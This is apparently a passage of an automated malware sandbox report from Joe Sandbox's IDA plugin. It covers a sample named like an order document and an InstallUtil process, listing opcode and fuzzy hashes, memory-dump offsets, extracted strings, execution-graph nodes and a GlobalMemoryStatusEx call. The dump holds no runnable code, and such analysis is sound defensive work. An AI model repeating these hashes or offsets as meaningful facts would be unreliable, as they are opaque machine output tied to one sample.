                                          • Instruction Fuzzy Hash: 5FC08C30304200CBE7006B54E08C22A3622E791341F1080268206AB280CB7C0C088BA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b95fb95677544c03cee17de5f0c15d04f477cd6b829c2df32b0a39125e9521f
                                          • Instruction ID: 8f92abec1adfef62b03388d401724935ef5bdb3193933ebc61e6107b27d43d74
                                          • Opcode Fuzzy Hash: 9b95fb95677544c03cee17de5f0c15d04f477cd6b829c2df32b0a39125e9521f
                                          • Instruction Fuzzy Hash: 7DB09232044208AB8B009A84E904855BF69EB987007008025BA090A1118B32A922DBD5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq$,bq
                                          • API String ID: 0-1616511919
                                          • Opcode ID: f927025e310761f6efb5587bfb57f27df201dc465a5b0aba18e72383f2e4507d
                                          • Instruction ID: c709bd805d3dc5bcf5fff72bbf41965380b10ad70eefc8fbfa86e55d819e2b59
                                          • Opcode Fuzzy Hash: f927025e310761f6efb5587bfb57f27df201dc465a5b0aba18e72383f2e4507d
                                          • Instruction Fuzzy Hash: D1D12935A04209CFCB54DF68C594AA9BBF2BF88351F6584A9E805AF362C735EC81CB50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ($5
                                          • API String ID: 0-1850010575
                                          • Opcode ID: 2275b18dd10cd5c4d000931084c7968f6f4ec045d007630a4f3111d10b5427a1
                                          • Instruction ID: 3b04a18b0cbd89e976f6c376f23de80462e8fec7a2cf8c2d28b9deebd4167060
                                          • Opcode Fuzzy Hash: 2275b18dd10cd5c4d000931084c7968f6f4ec045d007630a4f3111d10b5427a1
                                          • Instruction Fuzzy Hash: E1511DB1D056588BEB2CCF2B8D157DAFAF3AFC9300F04C1FA994CA6254DB700A858E51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: F$H
                                          • API String ID: 0-45678692
                                          • Opcode ID: 6259058913e8193725ac7d9e5549731ff54e759329225054f378645d5d12b47a
                                          • Instruction ID: 2ffa7c9b8e4577d083c071667abdd4ffcc12e52f017b9d685e0c2ae63ba5b401
                                          • Opcode Fuzzy Hash: 6259058913e8193725ac7d9e5549731ff54e759329225054f378645d5d12b47a
                                          • Instruction Fuzzy Hash: 94412E71E05A188BEB58CF6B8D4469EFAF3AFC9341F54C1B9940CAA264EF3405869F01
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (bq
                                          • API String ID: 0-149360118
                                          • Opcode ID: 01a367e68f8da93c07f3e8f15a21bcf6c249e22f64479ff59b558dfad8edeb6b
                                          • Instruction ID: 591f0d34140b9371df7dd93d55a83d0590d244131124782a4059123c9461aefe
                                          • Opcode Fuzzy Hash: 01a367e68f8da93c07f3e8f15a21bcf6c249e22f64479ff59b558dfad8edeb6b
                                          • Instruction Fuzzy Hash: 32326874E002168FCB99DF69D49466EFBF2FF88301F248529D55ADB341EB34A901CB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: 0d50f4c2043333c870208ff2272f5227961ce1456ef202b02537c067dd595960
                                          • Instruction ID: 907a029701e594e4aeab50887956e342fe9d0032386ffb81e4296bb67f51c5d7
                                          • Opcode Fuzzy Hash: 0d50f4c2043333c870208ff2272f5227961ce1456ef202b02537c067dd595960
                                          • Instruction Fuzzy Hash: 2FA13470E01218CFEB64CFAAD994B9DBBF2FB89340F109069D519AB311DBB05985CF80
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Te^q
                                          • API String ID: 0-671973202
                                          • Opcode ID: b0b8fa5f265c2a870a40daff90efb5f1ef782546dc4b86f51751e8c4b8f2e559
                                          • Instruction ID: ac6d1edf0af36cd957e3564a07af65469bccfd8304757231a244542797c0939a
                                          • Opcode Fuzzy Hash: b0b8fa5f265c2a870a40daff90efb5f1ef782546dc4b86f51751e8c4b8f2e559
                                          • Instruction Fuzzy Hash: D3A10474E01218CFEB64CFAAD994B9DBBF2FB88340F109069D519AB354DB745985CF40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: e37e5541d5fb7734ac7b22b4ce4ce0c055c4457841b5373f3611a5dcf6f2bb83
                                          • Instruction ID: 060f840a6288be87078ab0813be766feadd7dd3736b4025f80c49f84418753a2
                                          • Opcode Fuzzy Hash: e37e5541d5fb7734ac7b22b4ce4ce0c055c4457841b5373f3611a5dcf6f2bb83
                                          • Instruction Fuzzy Hash: A9517171D056588FE719CF2B8D152CAFAF3AFC9300F09C1F6994CA6265EB740A868F51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H
                                          • API String ID: 0-2852464175
                                          • Opcode ID: 72494844fe63e76bff31c7f5fbbd685b6e94357003f936a11f11ad3f95761bc2
                                          • Instruction ID: a41bb29b74c97f3ee008109f316a2a982a98ab4ff94a16f731d2a52198f4fd3f
                                          • Opcode Fuzzy Hash: 72494844fe63e76bff31c7f5fbbd685b6e94357003f936a11f11ad3f95761bc2
                                          • Instruction Fuzzy Hash: F4418171D05B548FE759CF6B8C4059AFBF3AFC9201F18C1BA984CAB265EB3409468F51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )
                                          • API String ID: 0-2427484129
                                          • Opcode ID: b4b32374bbb18968f108e153c2a9bd16670a003023fa9da6d4e303efdf71a49c
                                          • Instruction ID: 7b90f8ea219c73f242ad750925746a2383303a2569d3d2e9c256f93ddc2f73f0
                                          • Opcode Fuzzy Hash: b4b32374bbb18968f108e153c2a9bd16670a003023fa9da6d4e303efdf71a49c
                                          • Instruction Fuzzy Hash: 6F319E71E056589FEB59DF2B884519AFFF7AFC9300F18C5FAC44CAA225DA3009858F51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: )
                                          • API String ID: 0-2427484129
                                          • Opcode ID: 04702f1f9001a93154d228c01189ea13c22e58a069c08162b9c3b511e65ac15a
                                          • Instruction ID: e815ade0d69a6232e73faeb88a8c8f9533ce3d91dee40bb8e32736befec3000e
                                          • Opcode Fuzzy Hash: 04702f1f9001a93154d228c01189ea13c22e58a069c08162b9c3b511e65ac15a
                                          • Instruction Fuzzy Hash: 21319B71E056688FEB58DF6B8C4929AFBF7AFC9301F14C1BAC40CA6214DB3049858F50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afd2db17c59c3416e25f28857820f40003930a70f1eb97b549eb0a6976dbda7d
                                          • Instruction ID: de0961fb1aee74b8525c49e8b145c3126eb4164068c1ea86ca1794ab4df235c7
                                          • Opcode Fuzzy Hash: afd2db17c59c3416e25f28857820f40003930a70f1eb97b549eb0a6976dbda7d
                                          • Instruction Fuzzy Hash: A112B271E006189FDB54CFAAD98069EFBF2FF88304F24C16AD459AB219D734A946CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4a0e79b5d2428938e34e518126b0aa429806e66ba3c2eddacb958651e6e3063
                                          • Instruction ID: f6edbe053c27f3c82b9b658b025be2cbc70ccddb36c1f047b19d3fd31da70aa5
                                          • Opcode Fuzzy Hash: a4a0e79b5d2428938e34e518126b0aa429806e66ba3c2eddacb958651e6e3063
                                          • Instruction Fuzzy Hash: 76A17232E002168FCF15DFB9C8849DEBBB6FF85301B15456AE909BB259DB31E905CB50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca3f0ca4adb80f49190f2e9e8c4ade313b8741e28c700abc5863bd169f2b6126
                                          • Instruction ID: 0189b6b379b4f7320e056c1c27deaa716afc99e19a060240ba0d3da089d7c45f
                                          • Opcode Fuzzy Hash: ca3f0ca4adb80f49190f2e9e8c4ade313b8741e28c700abc5863bd169f2b6126
                                          • Instruction Fuzzy Hash: 9E91CDB4D05208CFEF84CFA9C9497EDBBF1EB4A304F15802AD419B7250D7798A45CBA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60e2609c9e5b01639c93423cec1efce781740702191577efbc26e9ad32e3c53d
                                          • Instruction ID: 8fa455b1fab67ae06a77dc4bf7146731ef4cf66c1592b613f12e50a2dc2bdd67
                                          • Opcode Fuzzy Hash: 60e2609c9e5b01639c93423cec1efce781740702191577efbc26e9ad32e3c53d
                                          • Instruction Fuzzy Hash: 3991EEB4D05208CFEF84CFE9C5897EDBBF1AB4A304F15802AC419B7260D7788A44CBA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: af06ae66beeb369daa4bf67e7a66d0f72926c48cd762195a996a1ad1eef9e61e
                                          • Instruction ID: 2fd68b27f1cea90f4a015e2fe5e250d22f4b0f5e2b033c0d923dea0ec0be86e3
                                          • Opcode Fuzzy Hash: af06ae66beeb369daa4bf67e7a66d0f72926c48cd762195a996a1ad1eef9e61e
                                          • Instruction Fuzzy Hash: DC81F370E06218CFDB94DFA9E8887ADBBF2BB99304F109069D409A7251DB789985CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e973c0c4e4617d12182f7b782d15e95a3beea374c6e1feb9a02f958097676d9
                                          • Instruction ID: 7f59d5b869b185ff65c16011270e4bab42225071552ddd15083cd2ab258a49dd
                                          • Opcode Fuzzy Hash: 4e973c0c4e4617d12182f7b782d15e95a3beea374c6e1feb9a02f958097676d9
                                          • Instruction Fuzzy Hash: FA81F470E06218CFDBA4DFA9E4887EDBBF2BB59304F109069D409A7251DB789945CF50
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cd9b110a40faeada792e168f2a506aa9299dea9ecdd1b93e32040a3a3de7a697
                                          • Instruction ID: 381bb840d2c628a511005de69a2022f9745d667a24a2c2fbe3453a699671873a
                                          • Opcode Fuzzy Hash: cd9b110a40faeada792e168f2a506aa9299dea9ecdd1b93e32040a3a3de7a697
                                          • Instruction Fuzzy Hash: D851E4B5D412698FDB60DF55CA44BE9BBB2AB48304F15C8EAC90AB3250D7B16EC1CF41
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aab7a280a1f4051eb72e5647423479259f80e4720c4f6c44122bb9fbef358507
                                          • Instruction ID: 39683357de9e4b250f8d9440de9f132d912d8ac01d18efcd1883bd0137177cc3
                                          • Opcode Fuzzy Hash: aab7a280a1f4051eb72e5647423479259f80e4720c4f6c44122bb9fbef358507
                                          • Instruction Fuzzy Hash: 3C4156B1E016199BEB18CFABD94059EFBF3AFC8300F14C16AD958AB224EB3059458F54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2092b11197dcaa11efbacf1a2799dee4c95d44dccbf065f08c4e33120990fa9b
                                          • Instruction ID: 0ad66cdd2a17cd34dde9dc79107425860dd05ec8049a161ba602be981de3b4ef
                                          • Opcode Fuzzy Hash: 2092b11197dcaa11efbacf1a2799dee4c95d44dccbf065f08c4e33120990fa9b
                                          • Instruction Fuzzy Hash: 00410B70E05229CBDB28DF6AC8486DAB7F6FB89300F10C0EA940DA7654DB344E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65cef7568a0410ebd17b70aac955631500391631cbc69cbdb3eceaca016f4d52
                                          • Instruction ID: 15c9c23612ef0b46c59c26a5bb66ffefc1675c957887843c3107a4d235c9ee00
                                          • Opcode Fuzzy Hash: 65cef7568a0410ebd17b70aac955631500391631cbc69cbdb3eceaca016f4d52
                                          • Instruction Fuzzy Hash: AC316FB1D09355CFE729CF2AC81429ABBF3AF89300F15C1EAD44CAA161DB340A85CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d3184acbfc20db88f07ae08c7cbe4acda8ae406fc79b071dd3f5c56533a1e82
                                          • Instruction ID: 72361c9cea4a5b3dde2922d05ca02910c11d2b6a8789f01f2cdb580bc5cf395f
                                          • Opcode Fuzzy Hash: 9d3184acbfc20db88f07ae08c7cbe4acda8ae406fc79b071dd3f5c56533a1e82
                                          • Instruction Fuzzy Hash: 1121C671D056588BEB68CF6BD9442DDBAF3AFC9301F14C0AAD808AA215DB344A85CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (o^q$(o^q$(o^q$/$\s^q
                                          • API String ID: 0-412772520
                                          • Opcode ID: 08780a5fd26b8af0a2e4d52dcc0a2724dd167f751c22402c73d9f093bacab890
                                          • Instruction ID: 0ce97f732ecd2e6a0961a69f71d611a929805b7558a725ec8cec4c2084c88b1f
                                          • Opcode Fuzzy Hash: 08780a5fd26b8af0a2e4d52dcc0a2724dd167f751c22402c73d9f093bacab890
                                          • Instruction Fuzzy Hash: 9571E8B4E10629CFDB24CF65C944BEDB7B5BF89300F0085A6D519AB381DB706A84CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_^q$(_^q$(_^q$(_^q
                                          • API String ID: 0-2697572114
                                          • Opcode ID: b658844ee6670ca18d46761a0d6c429f5c38565a388dca3431fec38de21fa908
                                          • Instruction ID: 8f54886bd40983de99805a2be90500c26c05d6123ece4959afcea7c3a79f1e4d
                                          • Opcode Fuzzy Hash: b658844ee6670ca18d46761a0d6c429f5c38565a388dca3431fec38de21fa908
                                          • Instruction Fuzzy Hash: FC710174B013049FC704DF78D8548EE7BB6EF8A304B15856AE5069B361EB31DC46CBA2

                                          Execution Graph

                                          Execution Coverage:10.9%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:19
                                          Total number of Limit Nodes:4
                                          execution_graph 25525 1380848 25526 138084e 25525->25526 25527 138091b 25526->25527 25529 1381340 25526->25529 25530 1381338 25529->25530 25531 138133b 25530->25531 25533 1387059 25530->25533 25531->25526 25534 1387063 25533->25534 25535 1387119 25534->25535 25538 64ace78 25534->25538 25543 64ace88 25534->25543 25535->25530 25539 64ace9d 25538->25539 25540 64ad0b2 25539->25540 25541 64ad730 GlobalMemoryStatusEx 25539->25541 25542 64ad4d0 GlobalMemoryStatusEx 25539->25542 25540->25535 25541->25539 25542->25539 25544 64ace9d 25543->25544 25545 64ad0b2 25544->25545 25546 64ad730 GlobalMemoryStatusEx 25544->25546 25547 64ad4d0 GlobalMemoryStatusEx 25544->25547 25545->25535 25546->25544 25547->25544
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30db03ec57021d0a18a71f6a11e0085925e31c3cca7e4de4ae8088144e1f97b5
                                          • Instruction ID: c5440f86f303c0b6232609840bbb3f6ea0e60f157797d722f23ec44617f2fa1d
                                          • Opcode Fuzzy Hash: 30db03ec57021d0a18a71f6a11e0085925e31c3cca7e4de4ae8088144e1f97b5
                                          • Instruction Fuzzy Hash: 0A53F831D10B1A8ADB11EB68C8845A9F7B1FF99300F55D79AE45877221EB70AAC4CF81
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ef01786d7940b67a7f703bc448babbedee82a11fbd3b069ab5df93678a43056
                                          • Instruction ID: 94a78faf136ba91b0cb14fa1d439e303c3a458b4fc4afba1d6b46ac69598c249
                                          • Opcode Fuzzy Hash: 6ef01786d7940b67a7f703bc448babbedee82a11fbd3b069ab5df93678a43056
                                          • Instruction Fuzzy Hash: 3A332D31D107198EDB11EF68C8806ADF7B1FF99304F15C79AE459A7221EB70AAC5CB81
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c980f6fddd837d6a2b4536fb7ef9c46315fb83eeeb511b19191e41e0f6b1c591
                                          • Instruction ID: 19e56fd63d59dc18a482d653bb64784ffec5efed7d22173acc95bb67bddeed93
                                          • Opcode Fuzzy Hash: c980f6fddd837d6a2b4536fb7ef9c46315fb83eeeb511b19191e41e0f6b1c591
                                          • Instruction Fuzzy Hash: D9B17C70E0030A8FDF14DFA9D9817ADBBF2AF88318F148529D859E7794EB749845CB81
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6e4c1bd9a0292d891fb5042bdf87e80d551c754aa2e812d14ff98ed67e42a2a
                                          • Instruction ID: cc301312089481ae356676b31c7c1b59c38f6ef0b3f28379a57f79644546b9f4
                                          • Opcode Fuzzy Hash: b6e4c1bd9a0292d891fb5042bdf87e80d551c754aa2e812d14ff98ed67e42a2a
                                          • Instruction Fuzzy Hash: 8E9170B0E003099FDF14DFA9C88579EBBF2BF88718F148129E405A7794EB749846CB81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2080 1386ea1-1386f0a call 1386c08 2089 1386f0c-1386f25 call 1386724 2080->2089 2090 1386f26-1386f55 2080->2090 2094 1386f57-1386f5a 2090->2094 2096 1386f5c-1386f70 2094->2096 2097 1386f8d-1386f90 2094->2097 2107 1386f72-1386f74 2096->2107 2108 1386f76 2096->2108 2098 1386f92-1386f99 2097->2098 2099 1386fa4-1386fa7 2097->2099 2100 1387168-138716f 2098->2100 2101 1386f9f 2098->2101 2102 1386fa9-1386fde 2099->2102 2103 1386fe3-1386fe6 2099->2103 2101->2099 2102->2103 2105 1386fe8 call 1387988 2103->2105 2106 1386ff6-1386ff8 2103->2106 2112 1386fee-1386ff1 2105->2112 2109 1386ffa 2106->2109 2110 1386fff-1387002 2106->2110 2111 1386f79-1386f88 2107->2111 2108->2111 2109->2110 2110->2094 2113 1387008-1387017 2110->2113 2111->2097 2112->2106 2116 1387019-138701c 2113->2116 2117 1387041-1387056 2113->2117 2119 1387024-138703f 2116->2119 2117->2100 2119->2116 2119->2117
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LR^q$LR^q
                                          • API String ID: 0-4089051495
                                          • Opcode ID: 1e70b064a1012340c14f99e87cac84f64e535cd59242404b8133b82ac080152e
                                          • Instruction ID: 5729e2dded029c5c0f0adfedddedb8b756680efd0258abeac67e336b8644e516
                                          • Opcode Fuzzy Hash: 1e70b064a1012340c14f99e87cac84f64e535cd59242404b8133b82ac080152e
                                          • Instruction Fuzzy Hash: 8D51F670E003459FDB15EBB8C4557AE7BB2EF86308F20846AE405EB241DB75D847CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2740 64ae09e-64ae0ab 2741 64ae0ad-64ae0d4 call 64ad4c0 2740->2741 2742 64ae0d5-64ae0e8 2740->2742 2746 64ae0eb-64ae0f4 call 64ad808 2742->2746 2749 64ae0fa-64ae138 2746->2749 2750 64ae0f6-64ae0f9 2746->2750 2749->2746 2755 64ae13a-64ae159 2749->2755 2757 64ae15b-64ae15e 2755->2757 2758 64ae15f-64ae1ec GlobalMemoryStatusEx 2755->2758 2761 64ae1ee-64ae1f4 2758->2761 2762 64ae1f5-64ae21d 2758->2762 2761->2762
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1890193017.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_64a0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f2e9dd30554b6be52c16ec58649d00403258186c14dc4c5373bcc613f2930cd
                                          • Instruction ID: 1c221c13846c0242349f8a572b02d90ad3732e4fb413115d38adc944e0146df1
                                          • Opcode Fuzzy Hash: 2f2e9dd30554b6be52c16ec58649d00403258186c14dc4c5373bcc613f2930cd
                                          • Instruction Fuzzy Hash: 884114B2D103559FCB04DF69D8006EABFF5AF99210F15856BE418E7381DB789885CBE0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2765 64ae178-64ae1b6 2766 64ae1be-64ae1ec GlobalMemoryStatusEx 2765->2766 2767 64ae1ee-64ae1f4 2766->2767 2768 64ae1f5-64ae21d 2766->2768 2767->2768
                                          APIs
                                          • GlobalMemoryStatusEx.KERNELBASE(8B550550), ref: 064AE1DF
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1890193017.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_64a0000_InstallUtil.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID:
                                          • API String ID: 1890195054-0
                                          • Opcode ID: 414e8b1aaaaf33546b5ce33ff55ec8f7fa9879b481353764089f7ddfb861fc83
                                          • Instruction ID: 97a936fcbe7ce441b2dd88b095891c47a25b83698b9db666b99391d2de411e8a
                                          • Opcode Fuzzy Hash: 414e8b1aaaaf33546b5ce33ff55ec8f7fa9879b481353764089f7ddfb861fc83
                                          • Instruction Fuzzy Hash: 1811F6B1C006599BCB10DF9AC545BDEFBF4EF48320F15816AD818B7241D778A944CFA5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1881658041.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1380000_InstallUtil.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PH^q
                                          • API String ID: 0-2549759414
                                          • Opcode ID: 9fc995d1de5c45fbf3e2fb2cb9464f4be634a5c7acbdab197b46dcf47617a251
